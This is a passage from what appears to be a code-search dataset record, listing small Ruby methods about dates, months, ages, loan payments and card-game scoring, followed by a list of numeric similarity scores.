"def vix_futures_settlement_date(year, month)\n subsequent_month, year_of_subsequent_month = *next_month(month, year)\n third_friday_of_subsequent_month = nth_weekday_of_month(3, DayOfWeek::Friday, subsequent_month, year_of_subsequent_month)\n if cboe_holiday?(third_friday_of_subsequent_month)\n prior_cboe_business_day(third_friday_of_subsequent_month) - 30\n else\n third_friday_of_subsequent_month - 30\n end\nend",
"def month\n sunday = @monday + 6\n return 1 if sunday.month == 1 && sunday.year == @year\n return 12 if @monday.month == 12 && @monday.year == @year\n (@monday + 2).month\n end",
"def yday\n end",
"def age_in_days(day, month, year)\n# TODO: return the age expressed in days given the day, month, and year of birth\n big_age = Date.today\n small_age = Date.parse(\"#{year}-#{month}-#{day}\")\n age = big_age - small_age\n return age.to_i\nend",
"def this_month\n day(Time.now)\n end",
"def day_of_month\n start_on.day.to_s\n end",
"def fixed_monthly_payment(amount, months, ir )\n amount*( ir * ( 1 + ir ) **months )/(( 1 + ir )**months - 1 )\nend",
"def get_days(year,month)\r\n # the number of days within a month is determined by the year\r\n case month\r\n when \"January\", \"March\", \"May\", \"July\", \"August\", \"October\", \"December\"\r\n days = 31\r\n when \"April\", \"June\", \"September\", \"November\"\r\n days = 30\r\n else\r\n if year.to_i % 400 == 0 # feb has 28 days when a year divisible by 400\r\n days = 28\r\n elsif year.to_i % 4 == 0\r\n days = 29\r\n else\r\n days = 28\r\n end\r\n end # end statement for case month when ...\r\n return days\r\n end",
"def normalize_month(month)\n month % 12 + 1\n end",
"def cwday\n end",
"def make_days\n month = (1..@day_num).collect do |day|\n Day.new(Date.parse(\"#{@year}-#{@month}-#{day}\"))\n end\n\n month[0].date.wday.times { month.insert(0, Day.new(Date.new))}\n month\n end",
"def es_menor(dia,mes,anio)\n fecha = false\n \tif (mes >= 1) && (mes <= 12) then\n\t\t\tcase mes\n\t\t\t\twhen 1,3,5,7,8,10,12 then\n\t\t\t\t\tmax = 31\n\t\t\t\twhen 4,6,9,11 then\n\t\t\t\t\tmax = 30\n\t\t\t\twhen 2 then\n\t\t\t\t\tif (es_bisiesto(anio) == true) then\n\t\t\t\t\t\tmax = 29\n\t\t\t\t\telse\n\t\t\t\t\t\tmax = 28\n\t\t\tend\n\t\tend\n\t\t\n\t\tif (dia >= 1) && (dia <= max)\n\t\t\tbirth = Date.civil(anio, mes, dia)\n\t\t\tnow = Date.today\n\t\t\tdifference_in_days = (now - birth).to_i\n\t\t\tdiff = (difference_in_days / 365.25).to_i\n\t\t\t\n\t\t\tif diff < 17\n\t\t\t\tfecha = true\n\t\t\tend\n\t\tend\n else\n\t\t\tfecha = false\n end\n return fecha\n\tend",
"def ultimoDia (mes, ano=7)\n fim_do_mes = { \"1\" => \"31\", \"01\" => \"31\", \"2\" => \"28\", \"02\" => \"28\", \"3\" => \"31\",\n \"03\" => \"31\", \"4\" => \"30\", \"04\" => \"30\", \"5\" => \"31\", \"05\" => \"31\",\n \"6\" => \"30\", \"06\" => \"30\", \"7\" => \"31\", \"07\" => \"31\", \"8\" => \"31\",\n \"08\" => \"31\", \"9\" => \"30\", \"09\" => \"30\", \"10\" => \"31\", \"11\" => \"30\",\n \"12\" => \"31\" }\n\n ultimo_dia = fim_do_mes[mes]\n\n # anos bissextos\n if ultimo_dia == \"28\" && ((ano % 4 == 0 && ano % 100 != 0) || ano % 400 == 0)\n ultimo_dia = ultimo_dia + 1\n end\n\n return ano + \"-\" + mes + \"-\" + ultimo_dia\n end",
"def days\n Advert.days_for_months(months)\n end",
"def jpd_cycle\r\n jpd_date - $jpd_2000\r\nend"
] | [
"0.7116016",
"0.69404125",
"0.6122316",
"0.6122316",
"0.5967227",
"0.59496856",
"0.5906849",
"0.58797467",
"0.58797467",
"0.5717164",
"0.57162505",
"0.57162505",
"0.5711818",
"0.5694669",
"0.5647944",
"0.5647944",
"0.5646241",
"0.5644094",
"0.56300116",
"0.55933905",
"0.55865675",
"0.55671644",
"0.5496876",
"0.54952127",
"0.54952127",
"0.5491841",
"0.5435919",
"0.5431969",
"0.54019856",
"0.5388121",
"0.538514",
"0.53487927",
"0.533815",
"0.5318619",
"0.5316674",
"0.5302787",
"0.5288686",
"0.52872217",
"0.52855587",
"0.52751553",
"0.52551955",
"0.5247186",
"0.5228511",
"0.52230346",
"0.52140635",
"0.5212886",
"0.52079976",
"0.5191221",
"0.5167747",
"0.51556253",
"0.5152574",
"0.5132327",
"0.5130115",
"0.5118255",
"0.51130265",
"0.511085",
"0.5103347",
"0.5089437",
"0.50805855",
"0.5077509",
"0.5073571",
"0.5073354",
"0.50538063",
"0.50518835",
"0.5036635",
"0.5035381",
"0.50324535",
"0.50269186",
"0.49928108",
"0.49922624",
"0.49883813",
"0.4988245",
"0.49866468",
"0.49846518",
"0.4982495",
"0.49780595",
"0.49780595",
"0.4962821",
"0.4952922",
"0.49502265",
"0.49415433",
"0.4936049",
"0.49351987",
"0.49242347",
"0.4923994",
"0.49230945",
"0.4922937",
"0.4912302",
"0.49093476",
"0.4893712",
"0.48838037",
"0.48731366",
"0.4860493",
"0.48446697",
"0.484403",
"0.4829252",
"0.48255163",
"0.48187327",
"0.4814879",
"0.48142818"
] | 0.72031826 | 0 |
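The zodiac document above maps a (month, day) pair onto the 0..11 sign indices described in its query. A quick usage check follows; the SIGN_NAMES list is an assumption, since the query only fixes 0 = Aries and 11 = Pisces.

# Assumed sign order; only the 0 = Aries and 11 = Pisces anchors come
# from the query string.
SIGN_NAMES = %w[Aries Taurus Gemini Cancer Leo Virgo
                Libra Scorpio Sagittarius Capricorn Aquarius Pisces]

p SIGN_NAMES[zodiac(3, 21)]   # => "Aries"     (first day of the table)
p SIGN_NAMES[zodiac(12, 25)]  # => "Capricorn" (sign spanning the year boundary)
p SIGN_NAMES[zodiac(2, 19)]   # => "Pisces"    (day after Aquarius ends)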
Returns the opposite of the given zodiac sign. 0 is Aries, 11 is Pisces. | def zodiacOpposite(sign)
return (sign+6)%12
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def negative\n abs.flip_sign\n end",
"def reverse_sign(an_integer)\n return 0 - an_integer\nend",
"def reverse_sign(an_integer)\n return 0 - an_integer\nend",
"def opposite(number)\r\n return number * (-1)\r\nend",
"def zodiacValue(sign)\n return (sign)%12\nend",
"def opposite(number)\n return 0 - number\nend",
"def opposite(number)\n number*-1\nend",
"def flip_sign\n self * -1\n end",
"def opposite(num)\n if num < 0\n return num.abs\n else num >= 0\n return num * -1 end\nend",
"def opposite(x)\n x * -1\nend",
"def opposite num\n -num\n end",
"def neg?\n sign < 0\n end",
"def opposite(x)\n puts -(x)\nend",
"def negative(number)\n -(number.abs)\nend",
"def not_zero(number)\n if number == 0\n return \"-\"\n else\n return number\n end\n end",
"def get_sign(coefficient)\r\n if coefficient < 0\r\n '-'\r\n else \r\n '+' \r\n end\r\n end",
"def zodiacComplements(sign)\n return [(sign+1)%12,(sign+11)%12]\nend",
"def zodiacComplements(sign)\n return [(sign+1)%12,(sign+11)%12]\nend",
"def neg(num)\n val = Convert(num, :numeric)\n sub(Convert(0, val.type), val)\n end",
"def negative(number)\n -number.abs\nend",
"def negative(number)\n -number.abs\nend",
"def negative(number)\n -number.abs\nend",
"def negative(number)\n -number.abs\nend",
"def negative2(number)\n -number.abs\nend",
"def negative(input, name: nil)\n negate(input, name: name)\n end",
"def negative(input, name: nil)\n negate(input, name: name)\n end",
"def negative(number)\n return number if number.negative? || number.zero?\n -number\nend",
"def make_negative(n)\n -(n.abs)\nend",
"def neg(direction)\n case direction.to_s\n when 'right'\n 'left'\n when 'left'\n 'right'\n when 'top'\n 'bottom'\n when 'bottom'\n 'top'\n end\n end",
"def negative(num)\n - num.abs\nend",
"def negation\n \"not\" if negate?\n end",
"def negative(number)\n number > 0 ? (number * -1) : number\nend",
"def negative(number)\n number > 0 ? -number : number\nend",
"def negative(number)\n number > 0 ? -number : number\nend",
"def make_numbers_negative(number)\n number *= -1 if \"++-\"[number <=> 0] == \"+\"\n number\n\n # -number.abs\nend",
"def makeNegative(num)\r\n if num >= 0\r\n return num * (-1)\r\n else\r\n return num * 1\r\n end\r\n end",
"def reverseNumber(n)\n n.to_s[0] == '-' ? -(n.to_s.reverse.to_i) : n.to_s.reverse.to_i\n # if n.to_s[0] == '-'\n # -(n.to_s.reverse.to_i)\n # else\n # n.to_s.reverse.to_i\n # end\nend",
"def negate?\n @negate\n end",
"def negative(num)\n num.positive? ? -num : num\nend",
"def negative(num)\n num > 0 ? -num : num # or -num.abs\nend",
"def negative(input)\n input.abs * -1\nend",
"def negative(num)\n if num.positive?\n -num\n else\n num\n end\nend",
"def negative(number)\n number <= 0 ? number : number * -1\nend",
"def negate?\n @negate\n end",
"def opposite n\n\t\tif n%2 == 0\n\t\t\treturn n+1\n\t\telse\n\t\t\treturn n-1\n\t\tend\n\tend",
"def -@\n return self.invert\n end",
"def -@\n return self.invert\n end",
"def sign(x)\n big_dec_sign = x.sign\n if big_dec_sign < 0\n -1\n elsif big_dec_sign > 0\n +1\n end\n end",
"def make_numbers_negative(number)\n number.positive? ? -(number) : number\nend",
"def reverse(z)\n\tx = z\n\ty = 0\n\twhile x!=0 do\n\t\ty *= 10\n\t\ty += x%10\n\t\tx /= 10\n\tend\n\treturn y\nend",
"def negative(num)\n num > 0 ? -num : num\nend",
"def negative(num)\n num > 0 ? -num : num\nend",
"def negative(num)\n num > 0 ? -num : num\nend",
"def negative(num)\n num > 0 ? -num : num\nend",
"def negative(num)\r\n num > 0 ? -num : num \r\nend",
"def reverse_ruby(x)\n x_rev_signed = x.positive? ? '' : '-'\n x_rev = (x_rev_signed + x.to_s.split('-').last.reverse).to_i\n x_rev.bit_length > 31 ? 0 : x_rev\nend",
"def make_numbers_negative(number)\n -number.abs\nend",
"def nozero(num)\n num > 0 ? -num : num \nend",
"def neg(n1)\n @number = -n1.number\n return self\n end",
"def negative(num)\n num <= 0 ? num : -num\nend",
"def negative(num)\n num <= 0 ? num : -num\nend",
"def invert(num) \n puts -num \nend",
"def complement(bit)\n bit.succ % 2\n end",
"def negative?; end",
"def negative(number)\n if number > 0\n -number\n else\n return number\n end\nend",
"def negative(n)\n return n if n <= 0\n -n\nend",
"def opposite(direction)\n op = {\"south\" => \"north\", \"north\" => \"south\", \"east\" => \"west\", \"west\" => \"east\", \"down\" => \"up\", \"up\" => \"down\"}\n return op[direction]\n end",
"def negative(num)\n return num if num.negative?\n -num\nend",
"def negative?\n !@positive \n end",
"def makeNegative(num)\n num > 0 ? num * -1 : num\nend",
"def invert!(alpha = false); end",
"def negative(num)\n num < 0 ? num : -num\nend",
"def test_negative_symbol\n test_value = RPN.symbol?('-')\n assert_equal(test_value,0)\n end",
"def negative(int)\n int <= 0 ? int : -int\nend",
"def make_negative(number)\n if number > 0\n number - (number.abs * 2)\n else \n number\n end\nend",
"def negative(integer)\n integer > 0 ? -integer : integer\nend",
"def convert_binary_to_signed_negative(address)\n twos_compliment = convert_to_signed_twos_complement address.to_i(2)\n HumanComputer::Processor.eight_bitify twos_compliment\n end",
"def negative?\n !!@negative\n end",
"def makeNegative(num)\n num < 0 ? num : -num\nend",
"def negative(num)\n\n if num <=0\n num\n else \n num * -1\n end\nend",
"def get_negate(n, algebraic_structure)\n negates_commaed = TYPE_SYMBOLS.first(n).each_with_index.map{ |t, i| \"#{t.downcase}#{algebraic_structure}.negate(tuple._#{i+1})\" }.join(\", \")\n \"override def negate(v: X) = { val tuple = unapply(v).get; apply(#{negates_commaed}) }\"\nend",
"def makeNegative(num)\n if(num.to_s.start_with?(\"-\"))\n return num\n else\n return -num\nend\nend",
"def make_negative(number)\n if number > 0\n number - (-number * -2)\n else\n number\n end\nend",
"def isnegative(siffra)\n output = false\n if siffra < 0\n output = true\n end\n\n return output\nend",
"def execute_NEG(operand)\n\t\t# all flags affected\n\t\tset_auxiliary_carry_flag_from 0 - operand.value.lowest_4_bits\n\t\tperform_arithmetic_operation_storing_result(operand, operand, 0 - operand.value)\n\tend",
"def invert() end",
"def opposite\n @opposite ||= DIRECTIONS[DIRECTIONS.index(direction) - 1]\n end",
"def negative?\n @negative\n end",
"def negative?\n @negative\n end",
"def negative(num)\n if num <= 0 \n return num\n else\n return num - (num * 2)\n end\nend",
"def negative(num)\n\treturn -num unless num <= 0\n\tnum\nend",
"def make_negative(num)\r\n num > 0 ? -num : num\r\nend",
"def state_neg\n case @scanner\n when INT\n integer(-(@scanner.matched.to_i))\n :state_op\n end\n end",
"def negate!\n negate self\n end",
"def negative(num)\n num *= -1 if num > 0\n num\nend",
"def negative(num)\n num < 0 ? num : -1 * num\nend",
"def nsw_neg(arg, name = \"\")\n Instruction.from_ptr(C.build_nsw_neg(self, arg, name))\n end",
"def negate(input, name: nil)\n _op(:negate, input, nil, name: name)\n end",
"def nuw_neg(arg, name = \"\")\n Instruction.from_ptr(C.build_nuw_neg(self, arg, name))\n end"
] | [
"0.6672668",
"0.6554936",
"0.6554936",
"0.65460396",
"0.6495725",
"0.64195913",
"0.6415371",
"0.641393",
"0.6412919",
"0.6399172",
"0.6367187",
"0.63448083",
"0.62792665",
"0.6030122",
"0.60131836",
"0.59967226",
"0.5991377",
"0.5991377",
"0.59625506",
"0.59225416",
"0.59225416",
"0.59225416",
"0.59225416",
"0.58594966",
"0.5858761",
"0.5858761",
"0.5834581",
"0.58157706",
"0.58077645",
"0.5807124",
"0.5801726",
"0.58009315",
"0.579166",
"0.579166",
"0.5786929",
"0.57833666",
"0.57768786",
"0.5751214",
"0.5746926",
"0.57370037",
"0.5733904",
"0.57301354",
"0.5710452",
"0.5708309",
"0.5685286",
"0.5670483",
"0.5670483",
"0.5666641",
"0.56218195",
"0.56212324",
"0.561878",
"0.561878",
"0.561878",
"0.561878",
"0.56093353",
"0.5603179",
"0.5601058",
"0.55982274",
"0.55892044",
"0.55888444",
"0.55888444",
"0.55828613",
"0.5582443",
"0.5571881",
"0.55708605",
"0.5554141",
"0.5552332",
"0.5551811",
"0.5523913",
"0.5523462",
"0.5515687",
"0.5512264",
"0.5510735",
"0.55099237",
"0.5502203",
"0.54954803",
"0.54928726",
"0.54918176",
"0.5488317",
"0.54874986",
"0.5478076",
"0.5472043",
"0.5470142",
"0.5439235",
"0.5413787",
"0.54111356",
"0.54051876",
"0.5404786",
"0.5404786",
"0.5397081",
"0.5392163",
"0.5388995",
"0.5388798",
"0.53864443",
"0.5380561",
"0.5375858",
"0.5359276",
"0.5349303",
"0.5347484"
] | 0.78304255 | 0 |
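zodiacOpposite above encodes "opposite" as a half-turn around the 12-sign wheel, so the function is its own inverse. The checks below are illustrative only, exercising the document's (sign + 6) % 12 arithmetic.

# (sign + 6) % 12 rotates halfway around the wheel, so applying the
# function twice returns the starting sign.
p zodiacOpposite(0)                            # => 6 (Aries -> Libra)
p zodiacOpposite(zodiacOpposite(5))            # => 5 (involution check)
p (0..11).map { |sign| zodiacOpposite(sign) }  # => [6, 7, 8, 9, 10, 11, 0, 1, 2, 3, 4, 5]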
0 is Aries, 11 is Pisces. | def zodiacPartners(sign)
return [(sign+4)%12,(sign+8)%12]
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def cardinal; end",
"def kcallipidos\n\t\t\t@lipidos * 9\n\t\tend",
"def rentas\n profesion ? 1 : 0\n end",
"def pontosStrike index\n\t\tif @rolls[index + 2]\n\t\t\tif @rolls[index + 2] == 10\n\t\t\t\tif @rolls[index + 4]\n\t\t\t\t\t10 + 10 + @rolls[index + 4]\n\t\t\t\telse\n\t\t\t\t\t10 + 10\n\t\t\t\tend\n\t\t\telse\n\t\t\t\tif @rolls[index + 3]\n\t\t\t\t\t10 + @rolls[index + 2] + @rolls[index + 3]\n\t\t\t\telse\n\t\t\t\t\t10 + @rolls[index + 2]\n\t\t\t\tend\n\t\t\tend\t\n\t\telse \n\t\t\t10\n\t\tend\n\tend",
"def psh_bonuses(roll)\n case roll\n when 1..5\n @@skills << \"Brawling\"\n puts \"Brawling skill\"\n when 6..10\n @@skills << \"Stealth\"\n puts \"Stealth skill\"\n when 11..15\n @@skills << \"Weapons Expert\"\n puts \"Wpn expert!\"\n when 16..20\n @@skills << \"Dodge\"\n puts \"Dodge skill\"\n when 21..37\n @@endurance += 1\n @@strength += 1\n @@agility += 1\n @@accuracy += 1\n @@willpower += 1\n @@intelligence += 1\n @@perception += 1\n @@appearance += 1\n puts \"+1 to each attribute\"\n when 38..44\n @@endurance += (d(6) + d(6))\n puts \"+2d6 endurance\"\n when 45..51\n @@strength += (d(6) + d(6))\n puts \"+2d6 strength\"\n when 52..58\n @@agility += (d(6) + d(6))\n puts \"+2d6 agility\"\n when 59..65\n @@accuracy += (d(6) + d(6))\n puts \"+2d6 accuracy\"\n when 66..74\n @@intelligence += (d(6) + d(6) + d(6))\n puts \"+3d6 intelligence\"\n when 75..83\n @@willpower += (d(6) + d(6))\n puts \"+2d6 willpower\"\n when 84..90\n @@appearance += (d(6) + d(6) + d(6))\n puts \"+3d6 appearance\"\n when 91..97\n @@skills << \"Martial Arts\"\n puts \"Martial arts skill!\"\n when 98..99\n @@endurance += 2\n @@strength += 2\n @@agility += 2\n @@accuracy += 2\n @@willpower += 2\n @@intelligence += 2\n @@perception += 2\n @@appearance += 2\n puts \"+2 to each attribute\"\n when 100\n @@endurance += d(6)\n @@strength += d(6)\n @@agility += d(6)\n @@accuracy += d(6)\n @@willpower += d(6)\n @@intelligence += d(6)\n @@perception += d(6)\n @@appearance += d(6)\n puts \"JACKPOT -- +d6 to EACH Attribute!\"\n end\n\n end",
"def imc\n\t\tnum = (@peso/(@talla*@talla)).round(2)\n\t\tif num < 18.5\n\t\t\tnum #- Bajo peso\"\n\t\telsif num > 18.5 and num < 24.9\n\t\t\tnum #- Adecuado\"\n\t\telsif num > 25.0 and num < 29.9\n\t\t\tnum #- Sobrepeso\"\n\t\telsif num > 30.0 and num < 34.9\n\t\t\tnum #Obesidad grado 1\"\n\t\telsif num > 35.0 and num < 39.9\n\t\t\tnum #- Obesidad grado 2\"\n\t\telsif num > 40\n\t\t\tnum #- Obesidad grado 2\"\n\t\tend\t\t\t\n\tend",
"def pontosSpare index\n\t\tif @rolls[index + 1]\n\t\t\t10 + @rolls[index + 1]\n\t\telse\n\t\t\t10\n\t\tend\n\tend",
"def scorePaper m\n\t\t[0,1]\n\tend",
"def scorePaper m\n\t\t[1,0] \n\tend",
"def ordinal; end",
"def smart_aces hand\n# Adjusts the value of \"Ace\" elements to be either 1 or 11 depending on the hand total\n\thand_total = hand.reduce :+\n\tif hand_total < 12 && hand_total > 2\n\t\thand.map! do |card|\n\t\t\tif card == 1\n\t\t\t\t11\n\t\t\telse\n\t\t\t\tcard\n\t\t\tend\n\t\tend\n\telsif hand_total > 21\n\t\thand.map! do |card|\n\t\t\tif card == 11\n\t\t\t\t1\n\t\t\telse\n\t\t\t\tcard\n\t\t\tend\n\t\tend\n\telsif hand_total == 2\n\t\thand[0] = 11\n\tend\n\nend",
"def scoreRock m\n\t\t[0,1] \n\tend",
"def total\n total = 0\n aces = 0\n @hand.each do |card|\n case card[0]\n when 2..10 then total += card[0]\n when 'A' then aces += 1\n else total += 10\n end\n end\n total += add_aces(total, aces)\n total\n end",
"def raindrops num\n output = \"\"\n output << \"Pling\" if num % 3 == 0\n output << \"Plang\" if num % 5 == 0\n output << \"Plong\" if num % 7 == 0\n output.empty? ? num.to_s : output\nend",
"def vypis_reseni\n\n vystup = \"(\"\n @reseni.each do |prvek|\n if(prvek)then\n vystup += \"1\"\n else\n vystup += \"0\"\n end \n end\n vystup += \")\"\n \n return vystup\n end",
"def natural_bonus\n 0\n end",
"def values\n return [1,11] if ace?\n return [10] if face_card?\n [@identifier]\n end",
"def numbers\n @board.map!.with_index do |e, i|\n e == AIR ? i.to_s : e\n end\n draw_board\nend",
"def scoreRock m\n\t\t[1,0]\n\tend",
"def value(hand)\n # Sorting hack to get aces at the very end so we count them last\n hand.sort_by { |c| c.to_i != 0 ? c : c[0] - 81 }.reverse().inject(0) do |total,cur|\n if cur.to_i != 0\n total + cur # 2-10 case\n elsif [\"J\",\"Q\",\"K\"].include? cur\n total + 10 # J,Q, or K\n elsif cur == \"A\"\n if (total+11) > 21\n total + 1 # Count ace as 1\n else\n total+11 # Count ace as 11\n end\n end\n end\n end",
"def raindrops(number)\n raindrops_str = ''\n\n raindrops_str += 'Pling' if number % 3 == 0\n raindrops_str += 'Plang' if number % 5 == 0\n raindrops_str += 'Plong' if number % 7 == 0\n\n if raindrops_str == ''\n raindrops_str = number.to_s\n end\n\n raindrops_str\nend",
"def dices\n\t\t@rollAgain = 0\n\t\t@goalParam = 0\n\tend",
"def primordial; end",
"def score\n return 'love' if @points == 0\n return 'fifteen' if @points == 1\n return 'thirty' if @points == 2\n return 'forty' if @points == 3 \n end",
"def succ\n if (@type == \"t\" && @number == 4) || (@type != \"t\" && @number == 9)\n number = 1\n elsif @type == \"t\" && @number == 7\n number = 5\n else\n number = @number + 1\n end\n return Pai.new(@type, number)\n end",
"def charge(age)\n case age\n when (0..6)\n 0\n when (7..12)\n 300\n when (13..18)\n 600\n else\n 1000\n end\nend",
"def set\n\t$one = \"1\"\n\t$two = \"2\"\n\t$three = \"3\"\n\t$four = \"4\"\n\t$five = \"5\"\n\t$six = \"6\"\n\t$seven = \"7\"\n\t$eight = \"8\"\n\t$nine = \"9\"\n\t$turn = 0\t\t\nend",
"def fo_tool\n return actor.equips[0] if actor.primary_use == 1\n return actor.equips[1] if actor.primary_use == 2\n return actor.assigned_item if actor.primary_use == 3\n return actor.assigned_item2 if actor.primary_use == 4\n return actor.assigned_item3 if actor.primary_use == 5\n return actor.assigned_item4 if actor.primary_use == 6\n return actor.assigned_skill if actor.primary_use == 7\n return actor.assigned_skill2 if actor.primary_use == 8\n return actor.assigned_skill3 if actor.primary_use == 9\n return actor.assigned_skill4 if actor.primary_use == 10\n end",
"def score\n\t\tpontos = 0\n\t\tindex = 0\n\t\twhile (index < 20 && @rolls[index]) do\n\t\t\tif strike? index\n\t\t\t\tpontos += pontosStrike (index)\n\t\t\telsif spare? index\n\t\t\t\tpontos += pontosSpare (index)\n\t\t\telsif @rolls[index + 1]\n\t\t\t\tpontos += @rolls[index] + @rolls[index + 1]\n\t\t\telse\n\t\t\t\tpontos += @rolls[index]\n\t\t\tend\n\t\t\tindex += 2\n\t\tend\n\t\tpontos\n\tend",
"def card_scores\n card_scores = {\n \"JOKER\" => 13, \"J♠\" => 12, \"J♣\" => 11, \"A♠\" => 10, \"K♠\" => 9, \"Q♠\" => 8,\n \"10♠\" => 7, \"9♠\" => 6, \"8♠\" => 5, \"7♠\" => 4, \"6♠\" => 3, \"5♠\" => 2\n }\n card_scores.default = 0\n\n card_scores\n end",
"def clasificar\n if @sal <= 1\n \"poca\" \n elsif @sal > 1 and @sal <= 2\n \"media\"\n elsif @sal > 2\n \"mucha\"\n end\n end",
"def Traductor nume\n\nnumero = {}\nnumero[0] = \"Cero\"\nnumero[1] = \"Uno\"\nnumero[2] = \"Dos\"\nnumero[3] = \"Tres\"\nnumero[4] = \"Cuatro\"\nnumero[5] = \"Cinco\"\nnumero[6] = \"Seis\"\nnumero[7] = \"Siete\"\nnumero[8] = \"Ocho\"\nnumero[9] = \"Nueve\"\nnumero[10] = \"Diez\"\n\n\n\nreturn numero[nume.to_i]\n\n\nend",
"def score\n return 'love' if @points == 0\n return 'fifteen' if @points == 1\n return 'thirty' if @points == 2\n return 'forty' if @points == 3\n end",
"def score\n return 'love' if @points == 0\n return 'fifteen' if @points == 1\n return 'thirty' if @points == 2\n return 'forty' if @points == 3\n end",
"def boatswain\n return self.swabbie unless self.swabbie.nil?\n highval = 0\n self.axe.each do |flotsam|\n counter = self.filibuster(flotsam)\n highval = ((highval <=> counter) == 1) ? highval : counter\n end\n \".#{highval + 1}\"\n end",
"def single_card_value(card)\n case card[1].strip\n when \"2\"..\"10\" then card[1].to_i\n when \"J\", \"Q\", \"K\" then 10\n when \"A\" then 11\n end\nend",
"def get_hand_value(hand)\n hand_values = hand.map { |card| card[0]} \n \n total = 0\n #check if there are any Aces\n hand_values.each do |value|\n if value == 'A'\n total += 11\n elsif value.to_i == 0 # this is for J, Q, K\n total += 10\n else\n total += value.to_i\n end\n end\n # To accomodate Aces, subtract 10 from the total per Ace if the total is >21\n hand_values.select{|value| value == \"A\"}.count.times do \n total -= 10 if total >21\n end\n total\nend",
"def score \n return 'love' if @points == 0 \n return 'fifteen' if @points == 1 \n return 'thirty' if @points == 2 \n return 'forty' if @points == 3\n end",
"def apportion\n 385.times do |n|\n state = find_highest_priority\n @seats[state] += 1\n\n seat_number = 51 + n\n puts \"Assigning Seat #{seat_number} to #{state}\"\n end\n\n puts \"Just missed the cut...\"\n state = find_highest_priority\n puts \"Seat 436 would be assigned to #{state}\"\n\n @seats.each do |state, seats|\n printf(\"%20s\\t%3d\\n\", state, seats)\n end\n end",
"def scoreScissors m\n\t\t[0,1] \n\tend",
"def score(card)\n case card\n when :ace then 11 # assigns value to each symbol, helps with scoring\n when :king then 10\n when :queen then 10\n when :jack then 10\n else card\n end\nend",
"def pcode4\n school.sierra_code\n end",
"def ace_check\n cards[index_of_11][:points] = 1 if index_of_11 && (total > 21)\n end",
"def get_hand_score\n score = 0\n \n # Add up score of non-aces\n values = hand.map{|card| card.value}\n values.each do |val|\n if Array(2..10).include?(val.to_i)\n score += val.to_i\n elsif [\"J\", \"Q\", \"K\"].include?(val)\n score += 10\n end\n end\n\n # deal with the aces\n values.count(\"A\").times do\n if score + 11 <= 21\n score += 11\n else\n score += 1\n end\n end\n\n return score\n end",
"def digit; end",
"def check4aces num\n \tnum.each do |x|\n\t\tif x == 11\n\t\t\t@pScore.delete(11)\n\t\t\t@pScore << 1\n\t\tend\n\tend\n end",
"def roman digit\n\n\trules = [ 'I', 'V', 'X', 'L', 'C', 'D', 'M']\n\tnum = digit[0]\n\tplace = digit[1]\n\n\nromannumeral = []\nif num == 5\n\tromannumeral.push rules[place+1].to_s\n\n\nelse if num > 5\n\tromannumeral.push rules[place+1].to_s\n\tnum = num - 5\n\tnum.times do\n\tromannumeral.push rules[place].to_s\n\tend\n\nelse if num < 5\n\tnum.times do\n\t\tputs 'num<5'\n\tromannumeral.push rules[place].to_s\n\tend\n\n\tend\n\tend\n\tend\n\nreturn romannumeral\nend",
"def goal\n 28\n end",
"def get_int_value (value_string, current_total)\n case value_string\n # reg exp for 2-10, better way to do this? \n when /[2-9]|[1][0]/ \n value = value_string.to_i \n # face cards\n when /[JQK]/\n value = 10\n # aces\n when \"A\"\n if current_total + 11 <= 21\n value = 11\n else\n value = 1\n end\n end\n value\nend",
"def rank_for_print\n rank_print = @rank\n case @rank\n when :A then rank_print = \"Ace\"\n when :K then rank_print = \"King\"\n when :Q then rank_print = \"Queen\"\n when :J then rank_print = \"Jack\"\n end\n rank_print\n end",
"def determine_shape_for(pc, ri)\n\t\tif pc == '1'\n\t\t\treturn '3' if ri == 'E3' or ri == 'E4' #Flat Rate Envelope\n\t\t\treturn '1' #Letters\n\t\telsif pc == '2'\n\t\t\treturn '3' if ri == 'E3' or ri == 'E4' or ri == 'FE' #Flat Rate Envelope\n\t\t\treturn 'I' if ri == 'E5' or ri == 'E6' or ri == 'E7' #Legal Flat Rate Envelope\n\t\t\treturn '9' if ri == 'FP' #Flat Rate Padded Envelope\n\t\t\treturn '2' #Flats\n\t\telsif pc == '3'\n\t\t\treturn 'J' if ri == 'C6'\n\t\t\treturn 'K' if ri == 'C7'\n\t\t\treturn 'L' if ri == 'C8'\n\t\t\treturn '8' if ri == 'E8' or ri == 'E9' or ri == 'EE' #Regular/Medium Flat Rate Box\n\t\t\treturn '5' #Parcels\n\t\telsif pc == '4'\n\t\t\treturn '5' #Parcels\n\t\telsif pc == '5'\n\t\t\treturn '9' if ri == 'FP' #Flat Rate Padded Envelope\n\t\t\treturn 'F' if ri == 'FS' #Small Flat Rate Box\n\t\t\treturn '8' if ri == 'FB' #Regular/Medium Flat Rate Box\n\t\t\treturn 'D' if ri == 'PL' #Large Flat Rate Box\n\t\t\treturn 'E' if ri == 'PM' #Large Flat Rate Military Box\n\t\t\treturn '5' #Parcels\n\t\telsif pc == 'O'\n\t\t\treturn '7' #PMOD/Pallets\n\t\telse\n\t\t\treturn '0' #Default/Fill\n\t\tend\n\tend",
"def get_grade int\n\tcase int\n\twhen 90...100\n\t\treturn \"A\"\n\twhen 80...89\n\t\treturn \"B\"\n\twhen 70...79\n\t\treturn \"C\"\n\twhen 60...69\n\t\treturn \"D\"\n\twhen 50...59\n\t\treturn \"F\"\n\telse \n\t\treturn \"F\"\n\tend\nend",
"def score\n score = 0\n aces_count = 0\n @hand_contents.each do |card|\n if card.type == :face\n score += 10\n elsif card.type == :ace\n aces_count += 1\n score += 11\n elsif card.type == :number\n score += card.rank.to_i\n end\n end\n\n while score > 21 && aces_count > 0\n score -= 10\n aces_count -= 1\n end\n score\n end",
"def get_energia_lipidos\n\t\t\t\t@lipidos * 9\n\t\t\tend",
"def handle_ace(hand,sum)\n\t\tputs \"inside handleace #{sum} and #{hand}\"\n\t\tif sum > 21 && hand.include?(21)\n\t\t\thand.each { |x| \n\t\t\t\tif x==\"A21\" \n\t\t\t\tx=\"A1\" \n\t\t\t\tend}\n\t\t\treturn hand\n\t\tend\n\tend",
"def which_hand(roll)\n case roll\n when 1..7 then result = \"Right\"\n when 8..9 then result = \"Left\"\n when 10 then result = \"Ambidextrous\"\n end\nend",
